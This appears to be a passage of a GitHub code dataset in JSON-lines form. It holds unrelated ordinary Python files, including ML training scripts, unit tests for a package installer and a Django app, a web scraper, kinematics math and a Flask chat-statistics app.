torch.optim.Adam(discriminator.parameters(), lr=args.d_lr)\n scheduler_G = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_G, args.num_epochs, args.g_lr*0.05)\n scheduler_D = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_D, args.num_epochs, args.d_lr*0.05)\n run = datetime.now().strftime(\"%Y-%m-%d--%H-%M-%S\")\n cur_length = int(0.5*args.num_epochs)\n init_scale = 2**2\n step_size = (2**args.up_scale-init_scale) / cur_length\n print('loading ImageJ, please wait')\n ij = imagej.init('fiji/fiji/Fiji.app/')\n for epoch in range(args.start_epoch, args.num_epochs):\n factor = min(log2(init_scale+(epoch-1)*step_size), args.up_scale)\n 
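# editor's note: curriculum schedule -- the degradation factor starts at log2(2**2) = 2 and grows toward args.up_scale over the first cur_length epochs, after which the min() above caps it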
print('curriculum updated: {} '.format(factor))\n train_dataset = new_compress_curriculum(args, factor, 'train', stc=True)\n train(args, epoch, run, train_dataset, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, tensor, device, patch)\n scheduler_G.step()\n scheduler_D.step()\n if epoch % args.test_interval == 0:\n fid, psnr = test(args, generator, data.compress_csv_path('valid', args.dataset))\n print('\\r>>>> PSNR: {}, FID: {}'.format(psnr, fid))\n if epoch % args.print_interval == 0:\n print_output(generator, valid_dataset, device)\n test(args, generator, data.compress_csv_path('test', args.dataset), stitching=True)\n \nif __name__ == '__main__':\n main()\n\n","repo_name":"uw-loci/demo_wsi_superres","sub_path":"train_compress.py","file_name":"train_compress.py","file_ext":"py","file_size_in_byte":15752,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"25689358529","text":"import pygame\nfrom scipy.ndimage.filters import *\n\n\nclass GaussianBlur:\n '''\n A class that applies a Gaussian blur effect to the screen\n '''\n def __init__(self, kernelsize=7):\n self.kernel_size = kernelsize\n\n def filter(self, srfc, xpos, ypos, width, height):\n '''\n A function that produces the Gaussian blur\n\n :param srfc: the surface the Gaussian blur effect is applied to\n :type srfc: pygame.Surface\n :param xpos: horizontal start position of the filter\n :type xpos: int\n :param ypos: vertical start position of the filter\n :type ypos: int\n :param width: width of the filter\n :type width: int\n :param height: height of the filter\n :type height: int\n :return: the blurred surface\n :rtype: pygame.Surface\n '''\n nSrfc = pygame.Surface((width, height))\n pxa = pygame.surfarray.array3d(srfc)\n blurred = gaussian_filter(pxa, sigma=(self.kernel_size, self.kernel_size, 0))\n pygame.surfarray.blit_array(nSrfc, blurred)\n del pxa\n return nSrfc\n","repo_name":"2021HYUopensource/super-mario-python","sub_path":"classes/GaussianBlur.py","file_name":"GaussianBlur.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"13610830821","text":"import os\nimport time\nfrom unittest import mock\n\nfrom absl.testing import absltest\n\nfrom glazier.lib import buildinfo\nfrom glazier.lib import constants\nfrom glazier.lib import googet\nfrom glazier.lib import test_utils\n\n\nclass GooGetTest(test_utils.GlazierTestCase):\n\n def setUp(self):\n super(GooGetTest, self).setUp()\n self.install = googet.GooGetInstall()\n self.buildinfo = buildinfo.BuildInfo()\n self.flags = ['whatever', '-reinstall', 'http://example.com/team-%',\n r'http://example.co.uk/secure-%\\%', r'http://%.jp/%\\%']\n\n @mock.patch.object(googet.winpe, 'check_winpe', autospec=True)\n @mock.patch.object(googet.execute, 'execute_binary', autospec=True)\n @mock.patch.object(buildinfo.BuildInfo, 'Branch', autospec=True)\n @mock.patch.object(time, 'sleep', return_value=None)\n def test_launch_goo_get(\n self, unused_sleep, mock_branch, mock_execute_binary, mock_check_winpe):\n\n path = self.create_tempfile(file_path='googet.exe').full_path\n\n temp_dir = os.path.dirname(path)\n self.patch_constant(constants, 'SYS_GOOGETROOT', temp_dir)\n\n pkg = 'test_package_v1'\n retries = 5\n sleep_dur = 30\n mock_branch.return_value = 'example'\n\n # Use hosts paths\n mock_check_winpe.return_value = False\n\n mock_execute_binary.return_value = 0\n\n # Command called successfully\n self.install.LaunchGooGet(\n pkg,\n retries,\n sleep_dur,\n self.buildinfo,\n path=path,\n flags=[('http://example.com/team-unstable, '\n 'http://example.co.uk/secure-unstable, '\n 
'https://example.jp/unstable/'), '-reinstall', 'whatever'])\n cmd = [\n '-noconfirm', f'-root={os.path.dirname(path)}', 'install', '-sources',\n ('http://example.com/team-unstable, '\n 'http://example.co.uk/secure-unstable, '\n 'https://example.jp/unstable/'), '-reinstall', 'whatever'\n ]\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # String replacement of sources flag was successful\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=path, flags=self.flags)\n cmd = [\n '-noconfirm',\n f'-root={os.path.dirname(path)}',\n 'install',\n '-sources',\n ('http://example.com/team-example, '\n 'http://example.co.uk/secure-example%, '\n 'http://example.jp/example%'),\n 'whatever',\n '-reinstall',\n ]\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # Only pkg\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=None, flags=None)\n cmd = ['-noconfirm', f'-root={constants.SYS_GOOGETROOT}', 'install']\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # No Path\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=None, flags=self.flags)\n cmd = [\n '-noconfirm', f'-root={constants.SYS_GOOGETROOT}', 'install',\n '-sources',\n ('http://example.com/team-example, '\n 'http://example.co.uk/secure-example%, '\n 'http://example.jp/example%'), 'whatever', '-reinstall'\n ]\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # No flags\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=path, flags=None)\n cmd = ['-noconfirm', f'-root={constants.SYS_GOOGETROOT}', 'install']\n cmd.extend([pkg])\n mock_execute_binary.assert_called_with(path, cmd)\n\n # Path does not exist\n with self.assertRaisesRegex(\n googet.Error, 'Cannot find path of GooGet binary*'):\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path='C:\\\\abc\\\\def\\\\ghi',\n flags=self.flags)\n\n # Empty Package Name\n with self.assertRaisesRegex(\n googet.Error, 'Missing package name for GooGet install.'):\n self.install.LaunchGooGet(\n '', retries, sleep_dur, self.buildinfo, path=path, flags=self.flags)\n\n # Non zero return value\n mock_execute_binary.side_effect = googet.execute.ExecError('some_command')\n with self.assertRaisesRegex(\n googet.Error,\n 'GooGet command failed after ' + str(retries) + ' attempts'):\n self.install.LaunchGooGet(\n pkg, retries, sleep_dur, self.buildinfo, path=path, flags=self.flags)\n\n def test_add_flags(self):\n branch = 'example'\n\n # Character replacement\n result = self.install._AddFlags(self.flags, branch)\n self.assertEqual(result, [\n '-sources',\n (\n 'http://example.com/team-example, '\n 'http://example.co.uk/secure-example%, '\n 'http://example.jp/example%'\n ),\n 'whatever', '-reinstall'\n ])\n\n # Sources were passed as a string\n with self.assertRaisesRegex(\n googet.Error, 'GooGet flags were not passed as a list'):\n self.install._AddFlags('', branch)\n\n # Root flag passed\n with self.assertRaisesRegex(\n googet.Error, 'Root flag detected, remove flag to continue.'):\n self.install._AddFlags(self.flags + ['-root'], branch)\n\n # Sources keyword detected\n with self.assertRaisesRegex(\n googet.Error, 'Sources keyword detected*'):\n self.install._AddFlags(self.flags + ['-sources'], branch)\n\nif __name__ == '__main__':\n 
absltest.main()\n","repo_name":"google/glazier","sub_path":"glazier/lib/googet_test.py","file_name":"googet_test.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":1200,"dataset":"github-code","pt":"48"} +{"seq_id":"1320540995","text":"for key in html_dump.keys(): # For everything in html dump\n raw_html = html_dump[key] # The raw html.\n soup = BeautifulSoup(raw_html, 'html.parser') # Create html parser.\n text = soup.get_text() # The parsed html.\n\n linkdict = dict() # This is where the clean formatted data goes.\n linkdict['raw_html'] = str(raw_html) # Put in the raw html.\n linkdict['clean_html'] = str(text) # Put in the clean text.\n linkdict['link'] = str(key) # Put in the link for output.\n\n to_save_link_text[hash(key)] = linkdict","repo_name":"TimothyBruce/anwala.github.io","sub_path":"cs532-s19/assignments/A3/LaTeX/htmlCodeDump.py","file_name":"htmlCodeDump.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"41845724635","text":"from django.test import TestCase\nfrom .models import FriendRequest, User\n# Create your tests here.\n\ndef create_test_user(username='username'):\n return User.objects.create(username=username, password='password', email='email')\n\n\n\nclass UserModelTest(TestCase):\n\n def test_toggle_friend_request(self):\n #create and delete friend request from same person\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user1.toggle_friend_request(user2)\n self.assertIs(len(FriendRequest.objects.all()), 1)\n friend_request = user1.toggle_friend_request(user2)\n self.assertIs(len(FriendRequest.objects.all()), 0)\n \n \n def test_toggle_friend_request_from_two_users(self):\n #don't allow to create request if different user has already requested\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user1.toggle_friend_request(user2)\n friend_request = user2.toggle_friend_request(user1)\n self.assertIs(friend_request, False)\n\n def test_accept_friend_request(self):\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user2.toggle_friend_request(user1)\n \n self.assertIs(len(user1.friends.all()), 0)\n accept = user1.accept_friend_request(user2)\n self.assertIs(accept, True)\n self.assertIs(user1.friends.all().contains(user2), True)\n self.assertIs(user2.friends.all().contains(user1), True)\n accept = user1.accept_friend_request(user2)\n self.assertIs(accept, False)\n\n def test_remove_friend(self):\n user1 = create_test_user()\n user2 = create_test_user('user2')\n friend_request = user2.toggle_friend_request(user1)\n accept = user1.accept_friend_request(user2)\n self.assertIs(user1.friends.all().contains(user2), True)\n self.assertIs(user2.friends.all().contains(user1), True)\n user1.remove_friend(user2)\n self.assertIs(user1.friends.all().contains(user2), False)\n self.assertIs(user2.friends.all().contains(user1), False)\n\n \n\n","repo_name":"KacperKuznik/social-media-website","sub_path":"backend/users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72534194707","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport os, re\nimport urllib, urllib2\nimport json\n\ndef _parseJokes(page = 1):\n \"\"\"\n get funny jokes from qiushibaike\n \"\"\"\n\n url_24 = 
\"http://www.qiushibaike.com/text/page/%d\" % page \n headers = { 'Connection': 'Keep-Alive', \n 'Accept': 'text/html, application/xhtml+xml, */*', \n 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', \n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'} \n\n req_24 = urllib2.Request(url_24,headers = headers) \n\n opener_24 = urllib2.urlopen(req_24) \n\n html_24 = opener_24.read()\n rex = '
<div class=\"content\">(.*?)</div>' \n pattern = re.compile(rex, re.S)\n \n m_24 = re.findall(pattern, html_24)\n m_24 = [x.replace('\\n\\n', '\\n') for x in m_24]\n m_24 = [x.strip('\\n') for x in m_24]\n m_24 = [x.strip('<br/>
') for x in m_24]\n\n m_24 = [x.decode('utf-8') for x in m_24]\n \n return m_24\n\n\ndef updateJokes(page = 1):\n \"\"\"\n parse page=1's jokes and save into json\n \"\"\"\n if 'jokes.json' not in os.listdir('./story/joke'):\n os.mknod('./story/joke/jokes.json')\n total_jokes = {}\n else: \n with open('./story/joke/jokes.json', 'r') as f:\n total_jokes = json.load(f)\n picks = _parseJokes(page) # parse jokes\n\n with open('./story/joke/jokes.json', 'w') as f:\n new_keys = [x[:6] for x in picks]\n for i, new_key in enumerate(new_keys):\n total_jokes[new_key] = picks[i]\n \n json.dump(total_jokes, f, encoding = 'utf-8')\n\n\nif __name__ == \"__main__\":\n os.chdir('/home/zkr/pyWorkSpace/For_Majesty/reconstruct')\n updateJokes(1)\n\n","repo_name":"databatman/DataDog","sub_path":"src/parse/parse_joke.py","file_name":"parse_joke.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36124325832","text":"import math\r\n\r\n# constants\r\n\r\n# distance from ground to joint 2 (mm)\r\na_1 = 307.787\r\n\r\n# distance from joint 2 to joint 3 (mm)\r\na_2 = 168.742\r\n\r\n# distance from joint 3 to orbital joint 2 (mm)\r\na_3 = 286.176\r\n\r\n# distance from orbital joint 2 to orbital joint 3 (mm)\r\njoint_6_offset = 97.905\r\n\r\n# distance from orbital joint 3 to tool center point (TCP)\r\n# this will be input from the GUI (mm)\r\ntool_offset = 137.000\r\n\r\n# variables\r\ntheta_1 = 0\r\ntheta_2 = 0\r\ntheta_3 = 0\r\n\r\nthetas = [theta_1, theta_2, theta_3]\r\n\r\njoint_2_delta = 0\r\njoint_3_delta = 0\r\njoint_6_delta = 0\r\n\r\ndeltas = [joint_2_delta, joint_3_delta, joint_6_delta]\r\n\r\ndef cosine_law_angle(side_a, side_b, side_c):\r\n\tangle = math.acos((side_c**2 - side_a**2 - side_b**2) /\r\n\t\t\t\t\t\t(-2 * side_a * side_b))\r\n\treturn angle\r\n\r\ndef cosine_law_length(side_a, side_b, theta):\r\n\tlength = math.sqrt((side_a**2 + side_b**2) - \\\r\n\t\t\t\t\t\t(2 * side_a * side_b * math.cos(theta)))\r\n\treturn length\r\n\r\n\r\ndef to_coordinate(joint_2_origin_angle, joint_2_3_angle, joint_5_6_angle, x, y, z, approach):\r\n\r\n\tr_1 = math.sqrt(x**2 + z**2)\r\n\r\n\tphi_1 = math.atan(z / x)\r\n\tphi_2 = math.radians(90) - phi_1\r\n\r\n\tr_2 = cosine_law_length(r_1, a_1, phi_2)\r\n\r\n\tphi_3 = cosine_law_angle(a_1, r_2, r_1)\r\n\tphi_4 = cosine_law_angle(r_2, a_2, a_3)\r\n\r\n\tthetas[0] = math.radians(180) - (phi_3 + phi_4)\r\n\tthetas[1] = cosine_law_angle(a_2, a_3, r_2)\r\n\r\n\t# first revolute joint on x-z plane\r\n\tthetas[0] = round(math.degrees(thetas[0]), 2)\r\n\r\n\t# second revolute joint on x-z plane\r\n\tthetas[1] = round(math.degrees(thetas[1]), 2)\r\n\r\n\t# base joint - first revolute joint on x-y plane\r\n\tthetas[2] = round(math.degrees(math.asin(y / x)), 2)\r\n\r\n\tcalculate_deltas(\r\n\t\tjoint_2_origin_angle, joint_2_3_angle, joint_5_6_angle, thetas[0], thetas[1], thetas[2], approach)\r\n\r\ndef calculate_deltas(joint_2_origin_angle, joint_2_3_angle, joint_5_6_angle, theta_1, theta_2, theta_3, approach):\r\n\t# joint 2 always relative to vertical z which will never change.\r\n\t# theta_1 is now the new angle for joint 2 apply it to the current joint position\r\n\tdeltas[0] = theta_1 - joint_2_origin_angle\r\n\tdeltas[0] = round(deltas[0], 3)\r\n\r\n\t# joint 3 is relative to joint 2\r\n\t# take the required delta, subtract it from the current delta and apply it to the current joint position\r\n\tdeltas[1] = theta_2 - joint_2_3_angle\r\n\tdeltas[1] = round(deltas[1], 
3)\r\n\r\n\t# joint 6 delta is going to depend on the approach that we want\r\n\t# if parallel or perpendicular to the ground plane, we can calculate it based on the vertical axis which will never change\r\n\tif approach == 'parallel':\r\n\t\tdeltas[2] = theta_2 - theta_1 - joint_5_6_angle - 90\r\n\telif approach == 'perpendicular':\r\n\t\tdeltas[2] = theta_2 - theta_1 - joint_5_6_angle\r\n\t\r\n\tdeltas[2] = round(deltas[2], 3)\r\n\r\n\treturn deltas[0], deltas[1], deltas[2]\r\n","repo_name":"jquahian/project_longbow","sub_path":"inverse_kin.py","file_name":"inverse_kin.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41660327002","text":"# -*- coding:utf-8 -*-\n\n\n# Given a sorted linked list, delete all duplicates such that each element appear only once.\r\n#\n# Example 1:\r\n#\n#\n# Input: 1->1->2\r\n# Output: 1->2\r\n#\n#\n# Example 2:\r\n#\n#\n# Input: 1->1->2->3->3\r\n# Output: 1->2->3\r\n#\n#\n\n\n# Definition for singly-linked list.\r\n# class ListNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution(object):\r\n def deleteDuplicates(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: ListNode\r\n \"\"\"\r\n t_point = head\r\n while t_point:\r\n while t_point.next and t_point.next.val == t_point.val:\r\n t_point.next = t_point.next.next\r\n t_point = t_point.next\r\n return head\r\n\n","repo_name":"bonfy/leetcode","sub_path":"solutions/0083-remove-duplicates-from-sorted-list/remove-duplicates-from-sorted-list.py","file_name":"remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":548,"dataset":"github-code","pt":"48"} +{"seq_id":"19630862666","text":"from collections import deque\n\nfrom environment import *\nfrom NN import *\n\n\ndef main():\n pygame.init()\n fps=30\n fpsclock=pygame.time.Clock()\n SCREEN = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n agent = Agent(0, 0, 28, 0)\n \n epsilon = 1 # Epsilon-greedy algorithm in initialized at 1 meaning every step is random at the start\n max_epsilon = 1 # You can't explore more than 100% of the time\n min_epsilon = 0.01 # At a minimum, we'll always explore 1% of the time\n decay = 0.01\n\n replay_memory = deque(maxlen=1_000)\n\n # Main Model (updated every 4 steps)\n model = neural_net((99,), 8)\n\n # Target Model (updated every 100 steps)\n target_model = neural_net((99,), 8)\n target_model.set_weights(model.get_weights())\n\n steps_to_update_target_model = 0\n\n for episode in range(300):\n episode_time_limit = time.time()\n object_spawn_interval = time.time()\n grid = make_grid(ROWS, COLUMNS, WIN_WIDTH)\n agent.score = 0\n done = False\n while not done:\n steps_to_update_target_model += 1\n\n exp_prob = np.random.rand()\n if exp_prob <= epsilon:\n #explore\n action = np.random.choice(agent.actions)\n else:\n #exploit\n curr_state = feature_extractor(grid, agent)\n print('Exploiting')\n prediction = model.predict(np.array([curr_state]))\n action = np.argmax(prediction)\n \n new_state, reward, done, object_spawn_interval = step(agent, action, grid, object_spawn_interval, episode_time_limit)\n \n object_spawn_interval = object_spawn_interval\n\n\n grid = draw(SCREEN, new_state, ROWS, COLUMNS, WIN_WIDTH, WIN_HEIGHT)\n agent.draw(SCREEN)\n pygame.display.update()\n fpsclock.tick(fps)\n\n replay_memory.append([grid, agent, action, reward, new_state, done]) #grid == state\n\n if 
steps_to_update_target_model % 4 == 0 or done:\n history = train(replay_memory, model, target_model, done)\n \n grid = new_state\n agent.score += reward\n\n\n if done:\n print('Total training rewards: {} after n steps = {} with final reward = {}'.format(agent.score, episode, reward))\n \n\n if steps_to_update_target_model >= 100:\n print('Copying main network weights to the target network weights')\n target_model.set_weights(model.get_weights())\n steps_to_update_target_model = 0\n break\n\n epsilon = min_epsilon + (max_epsilon - min_epsilon) * np.exp(-decay * episode)\n\n return model, history\n\nif __name__ == '__main__':\n main()","repo_name":"Gift-py/DQN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29097010181","text":"#!/usr/bin/python3\n\"\"\"Rectangle class Module\"\"\"\nBaseGeometry = __import__('7-base_geometry').BaseGeometry\n\n\nclass Rectangle(BaseGeometry):\n \"\"\"\n Rectangle class inheriting from BaseGeometry\n\n Attributes:\n width: int > 0\n height: int > 0\n \"\"\"\n def __init__(self, width, height):\n \"\"\"Rectangle initializer\"\"\"\n self.integer_validator(\"width\", width)\n self.__width = width\n self.integer_validator(\"height\", height)\n self.__height = height\n","repo_name":"SifaKasena/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/8-rectangle.py","file_name":"8-rectangle.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18001470403","text":"from flask import *\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta\n\nmain = Blueprint('main', __name__, template_folder='templates')\n\n# Update number of posts stats\ndef calcPostStats(author, stats):\n\n if author in stats:\n stats[author] += 1\n else:\n stats[author] = 1\n\n# Update number of words stats\ndef calcWordStats(author, message, stats):\n\n if author not in stats:\n stats[author] = 0\n\n # Add one word for image/video post\n if \"<\" in message:\n stats[author] += 1\n\n for _ in message:\n stats[author] += 1\n\n# Update number of media stats\ndef calcMediaStats(author, message, stats):\n\n if author not in stats:\n stats[author] = 0\n\n if \"<\" in message:\n stats[author] += 1\n\ndef parseMessage(line, chat, metric, stats):\n split = line.split(\":\")\n\n if len(split) < 5:\n return False\n\n date = line.split(\",\")[0]\n timestamp = line.split(\"M:\")[0].split(\", \")[1]\n\n author = split[3][1:]\n message = split[4][1:]\n\n if metric == \"posts\":\n calcPostStats(author, stats)\n\n elif metric == \"words\":\n calcWordStats(author, message, stats)\n\n elif metric == \"media\":\n calcMediaStats(author, message, stats)\n\n chat[\"author\"] = author\n chat[\"message\"] = message\n chat[\"date\"] = date\n chat[\"timestamp\"] = timestamp + \"M\"\n\n return True\n\n# If date range is set, checks if message falls within range\ndef validMessageDate(line, beginDate):\n split = line.split(\":\")\n\n if len(split) < 5:\n return False\n\n date = line.split(\",\")[0]\n splitDate = date.split(\"/\")\n\n dateTime = datetime(int('20' + splitDate[2]), int(splitDate[0]), int(splitDate[1]))\n\n if dateTime < beginDate:\n return False\n\n return True\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef main_route():\n options = {}\n\n if request.method == 'GET':\n return render_template(\"home.html\")\n\n elif 
request.method == 'POST':\n\n if request.files['file'].filename == '':\n options['message'] = \"No File\"\n\n return render_template(\"home.html\", **options)\n\n chats = []\n stats = {}\n rangeSet = False\n\n metric = request.form['metric']\n file = request.files['file']\n timeUnit = request.form['time-unit']\n\n # Check if time range is set\n if timeUnit != \"all\":\n rangeSet = True\n\n now = datetime.now()\n timeNumber = int(request.form['time-number'])\n\n # Determine beginning range for date\n if timeUnit == \"year\":\n timeDelta = timedelta(days=365*timeNumber)\n\n elif timeUnit == \"month\":\n timeDelta = timedelta(days=30*timeNumber)\n\n else:\n timeDelta = timedelta(weeks=timeNumber)\n\n beginDate = now - timeDelta\n\n numChats = 0\n for line in file.readlines():\n chat = {}\n line = line.decode('utf-8')\n\n if rangeSet:\n if not validMessageDate(line, beginDate):\n continue\n\n if parseMessage(line, chat, metric, stats):\n chats.append(chat)\n numChats += 1\n\n stats = OrderedDict(sorted(stats.items(), key=lambda x: x[1], reverse=True))\n\n options['message'] = \"Success\"\n options['stats'] = stats\n\n return render_template(\"stats.html\", **options)\n","repo_name":"jonah18/whatstats","sub_path":"controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13160177954","text":"import numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.distributions.normal import Normal\r\n\r\n\r\nclass NoisyActivation(nn.Module):\r\n \"\"\"\r\n new method to pre-process the training data\r\n \"\"\"\r\n\r\n def __init__(self, shape, device, upper_bound, threshold):\r\n super(NoisyActivation, self).__init__()\r\n self.shape = shape\r\n self.device = device\r\n self.upper_bound = upper_bound\r\n self.threshold = threshold\r\n self.mus = nn.Parameter(nn.init.normal_(torch.empty(self.shape, device=self.device), 0, 0.2))\r\n self.rhos = nn.Parameter(nn.init.normal_(torch.empty(self.shape, device=self.device), 0, 1))\r\n self.sigma = (1 + torch.tanh(self.rhos)) / 2 * self.upper_bound\r\n\r\n self.normal = Normal(0, 1)\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n :param x: input\r\n :return:\r\n \"\"\"\r\n self.sigma = (1 + torch.tanh(self.rhos)) / 2 * self.upper_bound\r\n noise = self.sigma * (self.normal.sample(self.shape).to(self.device)) + self.mus\r\n return x + noise\r\n\r\n def inner_loss(self):\r\n \"\"\"\r\n return -log((1/n)*\\\\sum{sigma**2})\r\n \"\"\"\r\n return -torch.log(1 / np.prod(self.shape) * torch.sum(torch.pow(self.sigma, 2)))\r\n\r\n\r\ndef get_model(model_index, num_classes):\r\n \"\"\"\r\n get PyTorch models\r\n\r\n :param model_index: from 0 to 37\r\n :param num_classes:\r\n 0 alexnet\r\n 1 DenseNet121\r\n 2 DenseNet161\r\n 3 DenseNet169\r\n 4 DenseNet201\r\n 5 ge_resnext29_8x64d\r\n 6 ge_resnext29_16x64d\r\n 7 google_net\r\n 8 lenet\r\n 9 preresnet20\r\n 10 preresnet32\r\n 11 preresnet44\r\n 12 preresnet56\r\n 13 preresnet110\r\n 14 preresnet1202\r\n 15 RegNetX_200MF\r\n 16 RegNetX_400MF\r\n 17 RegNetY_400MF\r\n 18 resnet20\r\n 19 resnet32\r\n 20 resnet44\r\n 21 resnet56\r\n 22 resnet110\r\n 23 resnet1202\r\n 24 ResNeXt29_2x64d\r\n 25 ResNeXt29_4x64d\r\n 26 ResNeXt29_8x64d\r\n 27 ResNeXt29_32x4d\r\n 28 se_resnext29_8x64d\r\n 29 se_resnext29_16x64d\r\n 30 sk_resnext29_16x32d\r\n 31 sk_resnext29_16x64d\r\n 32 vgg11\r\n 33 vgg13\r\n 34 vgg16\r\n 35 vgg19\r\n \"\"\"\r\n model = None\r\n model_name = None\r\n try:\r\n if model_index == 
0:\r\n from models.alexnet import alexnet\r\n model = alexnet(num_classes)\r\n model_name = 'alexnet'\r\n elif model_index == 1:\r\n from models.densenet import DenseNet121\r\n model = DenseNet121(num_classes)\r\n model_name = 'DenseNet121'\r\n elif model_index == 2:\r\n from models.densenet import DenseNet161\r\n model = DenseNet161(num_classes)\r\n model_name = 'DenseNet161'\r\n elif model_index == 3:\r\n from models.densenet import DenseNet169\r\n model = DenseNet169(num_classes)\r\n model_name = 'DenseNet169'\r\n elif model_index == 4:\r\n from models.densenet import DenseNet201\r\n model = DenseNet201(num_classes)\r\n model_name = 'DenseNet201'\r\n elif model_index == 5:\r\n from models.genet import ge_resnext29_8x64d\r\n model = ge_resnext29_8x64d(num_classes)\r\n model_name = 'ge_resnext29_8x64d'\r\n elif model_index == 6:\r\n from models.genet import ge_resnext29_16x64d\r\n model = ge_resnext29_16x64d(num_classes)\r\n model_name = 'ge_resnext29_16x64d'\r\n elif model_index == 7:\r\n from models.googlenet import google_net\r\n model = google_net(num_classes)\r\n model_name = 'google_net'\r\n elif model_index == 8:\r\n from models.lenet import lenet\r\n model = lenet(num_classes)\r\n model_name = 'lenet'\r\n elif model_index == 9:\r\n from models.preresnet import preresnet20\r\n model = preresnet20(num_classes)\r\n model_name = 'preresnet20'\r\n elif model_index == 10:\r\n from models.preresnet import preresnet32\r\n model = preresnet32(num_classes)\r\n model_name = 'preresnet32'\r\n elif model_index == 11:\r\n from models.preresnet import preresnet44\r\n model = preresnet44(num_classes)\r\n model_name = 'preresnet44'\r\n elif model_index == 12:\r\n from models.preresnet import preresnet56\r\n model = preresnet56(num_classes)\r\n model_name = 'preresnet56'\r\n elif model_index == 13:\r\n from models.preresnet import preresnet110\r\n model = preresnet110(num_classes)\r\n model_name = 'preresnet110'\r\n elif model_index == 14:\r\n from models.preresnet import preresnet1202\r\n model = preresnet1202(num_classes)\r\n model_name = 'preresnet1202'\r\n elif model_index == 15:\r\n from models.regnet import RegNetX_200MF\r\n model = RegNetX_200MF(num_classes)\r\n model_name = 'RegNetX_200MF'\r\n elif model_index == 16:\r\n from models.regnet import RegNetX_400MF\r\n model = RegNetX_400MF(num_classes)\r\n model_name = 'RegNetX_400MF'\r\n elif model_index == 17:\r\n from models.regnet import RegNetY_400MF\r\n model = RegNetY_400MF(num_classes)\r\n model_name = 'RegNetY_400MF'\r\n elif model_index == 18:\r\n from models.resnet import resnet20\r\n model = resnet20(num_classes)\r\n model_name = 'resnet20'\r\n elif model_index == 19:\r\n from models.resnet import resnet32\r\n model = resnet32(num_classes)\r\n model_name = 'resnet32'\r\n elif model_index == 20:\r\n from models.resnet import resnet44\r\n model = resnet44(num_classes)\r\n model_name = 'resnet44'\r\n elif model_index == 21:\r\n from models.resnet import resnet56\r\n model = resnet56(num_classes)\r\n model_name = 'resnet56'\r\n elif model_index == 22:\r\n from models.resnet import resnet110\r\n model = resnet110(num_classes)\r\n model_name = 'resnet110'\r\n elif model_index == 23:\r\n from models.resnet import resnet1202\r\n model = resnet1202(num_classes)\r\n model_name = 'resnet1202'\r\n elif model_index == 24:\r\n from models.resnext import ResNeXt29_2x64d\r\n model = ResNeXt29_2x64d(num_classes)\r\n model_name = 'ResNeXt29_2x64d'\r\n elif model_index == 25:\r\n from models.resnext import ResNeXt29_4x64d\r\n model = 
